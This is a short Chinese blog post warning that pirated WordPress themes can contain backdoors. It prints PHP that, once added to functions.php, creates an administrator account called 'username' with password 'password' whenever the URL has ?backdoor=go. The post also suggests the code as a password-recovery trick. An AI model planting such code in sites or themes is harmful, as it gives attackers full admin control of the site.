小心！盗版主题中可能存在后门

wordpress除了大量官方的主题，还有为数众多的主题设计者发布免费和收费主题，很多童鞋经常到处收集主题拿回来测试使用，其中一些无良者将收集到的国外商业收费主题进行汉化修改，添加暗链、广告，甚至恶意代码，然后免费或者收费公开发布出去，诱使别人下载使用，达到不可告人的目的。另外，这些商业收费主题一般都是测试版本，主题代码不完善、功能缺失，个别测试版的商业主题启用后会自动向数据库中写入大量数据…….

下面的代码更加邪恶，可以自动添加一个角色为管理员的用户。

add_action('wp_head', 'holeinthewall'); function holeinthewall() { 	If ($_GET['backdoor'] == 'go') { 		require('wp-includes/registration.php'); 		If (!username_exists('username')) { 			$user_id = wp_create_user('username', 'password'); 			$user = new WP_User($user_id); 			$user->set_role('administrator'); 		} 	} }

将代码添加到您当前主题的 functions.php 文件或插件中，之后用特殊的链接，例如：example.com/?backdoor=go，打开这个链接后就会自动创建一个用户名：username 密码：password 的有管理员权限的用户并自动登录，之后想做什么都可以了。

前提是你后台默认注册角色是管理员。

在忘记网站登录密码时，可以用上述方法添加一个管理账号，然后用这个账号修改正常账号的密码。不过一定要记得用后把这个管理账号删除，同删除上面添加的代码。

所以，这里奉劝大家还是不要在自己的站点上使用盗版主题和插件，尽量到官方或原始发布站点下载主题，以免被开了后门也不知晓！

源代码出处：https://trickspanda.com/create-backdoor-wordpress/